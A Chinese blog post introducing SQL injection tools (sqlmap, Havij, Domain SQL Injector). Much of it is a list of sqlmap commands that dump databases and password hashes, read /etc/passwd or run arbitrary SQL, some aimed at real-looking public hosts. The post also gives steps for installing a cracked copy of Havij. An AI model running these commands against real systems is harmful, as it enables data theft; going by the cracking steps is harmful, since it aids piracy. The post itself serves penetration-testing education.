sql注入工具

Sqlmap

功能说明

SqlMap是一个开放源码的渗透测试工具,它可以自动探测和利用SQL注入漏洞来接管数据库服务器。它配备了一个强大的探测引擎,为最终渗透测试人员提供很多猥琐的功能,可以拖库,可以访问底层的文件系统,还可以通过带外连接执行操作系统上的命令

运行环境

Python

安装配置

解压压缩包,执行对应的python脚本即可

使用说明

当给sqlmap一个url的时候,它会:

1、判断可注入的参数

2、判断可以用那种SQL注入技术来注入

3、识别出哪种数据库

4、根据用户选择,读取哪些数据
sqlmap支持五种不同的注入模式:

1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。

2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。

3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。

4、联合查询注入,可以使用union的情况下的注入。

5、堆查询注入,可以同时执行多条语句的执行时的注入。

参照说明:http://drops.wooyun.org/tips/143

其他人总结wiki:
http://wiki.corp.qunar.com/pages/viewpage.action?pageId=47191193
http://wiki.corp.qunar.com/pages/viewpage.action?pageId=67540014

Havij

功能说明

是一个跨平台的工具,它能够帮助渗透测试人员发现和利用Web应用程序的SQL注入漏洞,还能够识别后台数据库类型、检索数据,甚至访问底层文件系统和执行系统命令

运行环境

Java

安装配置

此应用非开源,但有破解版本,安装时执行exe直接安装,以下说一下破解安装方式
1、安装Havij 1.17
2、从”Loader”文件夹内拷贝 “Loader.exe” 文件至安装目录
3、以管理员权限运行”Loader.exe”

4、点击”Register”

使用说明

Domain sql injector

功能说明

Domain SQL Injector是一款SQL注入扫描工具,与以往工具不同的是它是扫描同一服务器上的所有主机是否存在SQL注入漏洞,并将扫描结果以日志记录的方式保存下来

(1)爬行:抓取网站上的全部网页或请求数量
(2)反向IP查找:找到托管的共享托管服务器上的所有网站
(3)单模式攻击:爬行站点的SQLLi,并打印报告
(4)群发模式攻击:查找托管在域中的所有网站,逐个抓取,找到SQLi并打印报告

运行环境

Python

安装配置

解压压缩包,执行对应的python脚本即可

  1. ./Domain-SQLi-finder.py
    Script Help
    ./Domain-SQLi-finder.py -h
    针对单一网站攻击
    ./Domain-SQLi-finder.py --verbose 1 --url demo.testfire.net --crawl 50 --pages 5 --output testfire-SQLi.txt
    它爬全部或请求数量的页面,发现注射链接,发现injecatable参数和测试SQL对每个注射参数
    针对整个域

工具对比

名称 部署难度 功能等级 执行难度 成本
sqlmap 开源
havij 非开源
DSQL 开源

SQLMAP更多用法

参考: http://blog.csdn.net/junweifan/article/details/7604371

python sqlmap/sqlmap.py –u “http://www.anti-x.net/inject.asp?id=injecthere” –-tables  -D DB_NAME

 

python sqlmap/sqlmap.py -u "http://flight.qunar.com/site/oneway_list.htm?searchDepartureAirport=%E5%8C%97%E4%BA%AC&searchArrivalAirport=%E4%B8%8A%E6%B5%B7&searchDepartureTime=2014-12-03&searchArrivalTime=2014-12-06&nextNDays=0&startSearch=true&from=fi_dom_search"--

current-db

 

python sqlmap/sqlmap.py -u  "http://192.168.1.47/page.php?id=1&cat=2" -v 1

 

python sqlmap/sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1

-p "id"

 

python sqlmap/sqlmap.py -u  "http://biz.flight.qunar.com/sys/login?_t=1417441199555" -v 1

 

统一的格式 .XXX 代表 URL,Y 代表不同的参数

python sqlmap/sqlmap.py -u "XXX" Y

Y 具体地:

1.

python sqlmap/sqlmap.py -u "XXX"  -v 1

2. 指定参数注入

python sqlmap/sqlmap.py -u "XXX"  -v 1 -p "id"

3. 指定方法和 post 的数据

python sqlmap/sqlmap.py -u "XXX" --method "POST" --data "id=1&cat=2"

例如:

python sqlmap.py -u "http://192.168.1.47/page.php" --method "POST" --data "id=1&cat=2"

4. 通过代理注入

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --proxy "http://127.0.0.1:8118"

5. 指定关键词,也可以不指定。程序会根据返回结果的 hash 自动判断

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --string "STRING_ON_TRUE_PAGE"

6. 指定数据,这样就不用猜测其他的数据库里。可以提高效率。

--remote-dbms

7. 指纹判别数据库类型

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -f

8. 获取当前数据库,当前用户,所有用户,密码,所有可用数据库。

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --current-db

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --users

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --passwords

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --dbs

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --tables -D "information_schema"

Database: information_schema

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --columns -T "user" -D "mysql"

Database: mysql

Table: user

9. 显示指定的文件内容,一般用于 php

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --file /etc/passwd

10. 执行你自己的 sql 语句

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -e "SELECT password FROM mysql.user WHERE user = 'root' LIMIT 0, 1"

11.union 注入

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" --union- check

12. 保存注入过程到一个文件,还可以从文件恢复出注入过程,很方便,一大特色。你可以在注入的时候中断,有时间再继续。

python sqlmap.py -u "http://192.168.1.47/page.php?id=1&cat=2" -v 1 -b -o "sqlmap.log"


  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值